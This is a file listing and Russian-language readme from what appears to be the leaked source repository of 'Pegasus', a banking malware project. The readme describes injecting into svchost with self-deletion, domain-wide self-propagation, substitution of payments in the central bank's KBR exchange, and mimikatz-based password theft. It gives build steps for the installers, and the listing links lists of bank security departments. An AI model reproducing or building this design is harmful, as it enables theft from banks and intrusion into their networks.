https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/СБ Липецк на 17.11.2015.doc -------------------------------------------------------------------------------- /cvs_banks/Список СБ банков г. Воронежа на 13.02.2013 (со списком рассылки).doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/Список СБ банков г. Воронежа на 13.02.2013 (со списком рассылки).doc -------------------------------------------------------------------------------- /cvs_banks/акбарс.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/акбарс.csv -------------------------------------------------------------------------------- /cvs_banks/акрополь.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/акрополь.csv -------------------------------------------------------------------------------- /cvs_banks/генбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/генбанк.csv -------------------------------------------------------------------------------- /cvs_banks/икбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/икбанк.csv -------------------------------------------------------------------------------- /cvs_banks/интерпромбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/интерпромбанк.csv -------------------------------------------------------------------------------- /cvs_banks/металинвестбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/металинвестбанк.csv -------------------------------------------------------------------------------- /cvs_banks/минбанк.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/минбанк.csv -------------------------------------------------------------------------------- /cvs_banks/невский.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/невский.csv -------------------------------------------------------------------------------- /cvs_banks/рсхб.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/cvs_banks/рсхб.csv -------------------------------------------------------------------------------- /gen_payments_script/gen1.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeadNumbers/Pegasus/f83159ebcc2b2ba429b23805fdc66ab3eb2959f5/gen_payments_script/gen1.php -------------------------------------------------------------------------------- /readme.txt: -------------------------------------------------------------------------------- 1 | Проект Пегас - краткое описание содержимого 2 | 3 | Пегас - структурированный сложный проект под х32 и х64 платформы. 4 | Установщик инжектирует в память процесса svchost образ с ядром системы и модулями, после чего выполняется 5 | самоудаление с затиранием исходного файла. 6 | Передача управления в исходном инсталлере идет следующим образом: 7 | Shellcode -> InstallDispatcherDll 8 | Передача управления в новом процессе идет по схеме: 9 | Shellcode -> WorkDispatcherDll -> все остальные модули 10 | При установке поверх существующей версии выполняется контроль айди билда, и если он ниже или равен уже 11 | существующей версии - установка не выполняется. 12 | Подробности функционирования модулей потребуют значительного времени для описания, поэтому в случае необходимости 13 | предлагается смотреть исходники - они хорошо откомментированы и структурированы. 14 | 15 | Для сборки нужна студия не ниже 2013 и PHP Tools for Visual Studio от Devsense 16 | 17 | Размещение файлов по папкам 18 | 19 | binres 20 | Скомпилированные модули и другой код под х32 и х64 платформы 21 | 22 | BUILDS 23 | Финальные установщики под обе платформы, отладочная и релизная версии в зависимости от папки 24 | 25 | inc 26 | Программные модули (библиотеки), используемые различными подпроектами 27 | 28 | InstallDispatcherDll 29 | Модуль-установщик, выполняет инжект в новый процесс 30 | 31 | InstallerExe 32 | Проект начального установлика 33 | 34 | lib 35 | Файлы для успешной компиляции без MSVCRT 36 | 37 | LZ4_pack 38 | Утилита упаковки ресурсов 39 | 40 | mod_CmdExec 41 | Модуль запуска команд из панели (новый процесс, команда в консоли и т.п.) 42 | 43 | mod_DomainReplication 44 | Модуль самораспространения в домене 45 | 46 | mod_KBRI 47 | Модуль подмены платежей в КБР 48 | 49 | mod_KBRI_hd 50 | Модуль-инжектор для перехвата процесса обмена данными КБР и получения от mod_KBRI подмененных данных 51 | 52 | mod_LogonPasswords 53 | Модуль поиска паролей, переписанный и исправленный код mimikatz 54 | 55 | mod_NetworkConnectivity 56 | Модуль сетевой связи, в том числе через пайпы для машин с закрытым доступом в сеть 57 | 58 | RemoteServiceExe 59 | Специальный исполняемый файл, который забрасывается на удаленную систему в процессе распространения в домене 60 | 61 | shared 62 | Общие заголовочные и конфигурационные файлы 63 | 64 | Shellcode 65 | Шеллкод для загрузки и запуска присоединенных библиотек 66 | 67 | tools 68 | Утилиты и скрипты для сборки проекта и его частей 69 | 70 | WEB 71 | Клиентская часть админ-панели, интегрирована в проект студии 72 | 73 | web-adminpart 74 | Админская часть панели, копия с сервера разработки 75 | 76 | WorkDispatcherDll 77 | Модуль ядра системы 78 | 79 | 80 | В общем случае конфигурируется сначала \shared\config.h, затем собирается через скрипт \tools\MAKE_INSTALLERS.BAT 81 | с параметром Release или Debug 82 | Готовые билды в \BUILDS\ 83 | 84 | --------------------------------------------------------------------------------